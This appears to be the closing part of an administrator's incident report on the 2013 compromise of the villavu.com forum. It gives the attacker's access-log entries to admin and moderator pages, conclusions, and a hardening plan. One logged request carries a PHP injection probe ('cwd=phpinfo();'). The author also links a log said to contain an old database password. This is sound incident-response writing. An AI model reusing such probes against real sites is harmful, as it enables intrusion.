91.236.116.109 villavu.com - [05/Jul/2013:22:48:25 +0200] "POST /forum/ajax.php HTTP/1.1" 200 1429 "http://villavu.com/forum/admincp/index.php?do=head" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:50:18 +0200] "POST /forum/ajax.php HTTP/1.1" 200 1429 "http://villavu.com/forum/forum.php?cwd=phpinfo();" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:51:51 +0200] "POST /forum/ajax.php HTTP/1.1" 200 1429 "http://villavu.com/forum/admincp/faq.php?faq=%20welcome" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:56:17 +0200] "POST /forum/ajax.php HTTP/1.1" 200 580 "http://villavu.com/forum/showthread.php?t=95704" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:23:00:01 +0200] "POST /forum/ajax.php HTTP/1.1" 200 580 "http://villavu.com/forum/admincp/index.php?do=nav" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:23:00:01 +0200] "POST /forum/ajax.php HTTP/1.1" 200 580 "http://villavu.com/forum/admincp/index.php?do=head" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:23:00:12 +0200] "POST /forum/ajax.php HTTP/1.1" 200 580 "http://villavu.com/forum/admincp/attachment.php?do=types" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:23:10:49 +0200] "POST /forum/ajax.php HTTP/1.1" 200 580 "http://villavu.com/forum/admincp/index.php?do=head" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:23:10:49 +0200] "POST /forum/ajax.php HTTP/1.1" 200 580 "http://villavu.com/forum/admincp/index.php?do=nav" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:23:11:01 +0200] "POST /forum/ajax.php HTTP/1.1" 200 580 "http://villavu.com/forum/admincp/faq.php?faq=welcome" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:23:12:38 +0200] "POST /forum/ajax.php HTTP/1.1" 200 580 "http://villavu.com/forum/modcp/user.php?do=viewuser&u=490" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:23:12:45 +0200] "POST /forum/ajax.php HTTP/1.1" 200 580 "http://villavu.com/forum/modcp/user.php?do=viewuser&u=2538" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:23:13:28 +0200] "POST /forum/ajax.php HTTP/1.1" 200 580 "http://villavu.com/forum/modcp/user.php?do=viewuser&u=2" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:23:13:35 +0200] "POST /forum/ajax.php HTTP/1.1" 200 580 "http://villavu.com/forum/modcp/user.php?do=viewuser&u=1383" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
1.236.116.109 villavu.com - [05/Jul/2013:23:14:04 +0200] "POST /forum/ajax.php HTTP/1.1" 200 580 "http://villavu.com/forum/modcp/user.php?do=viewuser&u=45543" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:23:14:25 +0200] "POST /forum/ajax.php HTTP/1.1" 200 580 "http://villavu.com/forum/modcp/user.php?do=viewuser&u=5" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:23:15:10 +0200] "POST /forum/ajax.php HTTP/1.1" 200 580 "http://villavu.com/forum/modcp/forum.php?do=modify" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:23:16:39 +0200] "POST /forum/ajax.php HTTP/1.1" 200 580 "http://villavu.com/forum/modcp/forum.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"

Part 5: Conclusion

All in all, a few things are not clear. Mostly; how he was able to edit the /etc/lighttpd/lighttpd.conf file, and how was he able to restart the lighttpd server? This would require root access; and it also seems that he changed the permissions of /etc/lighttpd/lighttpd.conf to 777. Possibly one of the uploaded shells contained a root exploit?

Regardless, it seems very unlikely that he managed to escape the Linux-VServer; as it is explicitly written to be able to withstand root access in the guest. This is something I will investigate further.

I have no reason to believe that they took more data than the user table. This is of course still possible; but not likely.

The entire access.log of this IP can be found here: http://merlijn.xxx/foo.txt (including the old mysql password, who cares anymore)

Part 6: Afterthoughts

What we will do now:

  • Establish better personal hotline / contacts between administrators. Personally, I would like to go for GPG authentication.

  • Switch to bcrypt

  • Audit the database

  • Make everything in the docroot read only:

    mount -o bind /docroot /newdocroot
    mount -o remount,ro /newdocroot
    
  • Have mysql listen on a unix socket only; possibly even outside the vm

  • Set up a more restrictive firewall

  • Setting up tripwire / snort

  • IP filter on admincp (We already had an extra security part); or other extra authentication.

  • Restore the (broken) backup system.

  • Allow access to admincp and modcp ONLY over ssh, forwarding a specific port.

And finally... If I got paid to do this, I would:

  • Change to phpBB3.
  • Write my own bulletin board system in Python.
  • Set up a reverse proxy to only allow specific requests to vBulletin/phpBB.
  • Disable all unused php internal functions.

Update July 21: Some additional suggestions by the friendly and helpful 2600nl people, who also helped me out with the initial audit:

  • Making /etc read only
  • Mounting /proc with hidepid=2 to prevent users from seeing the processes of other users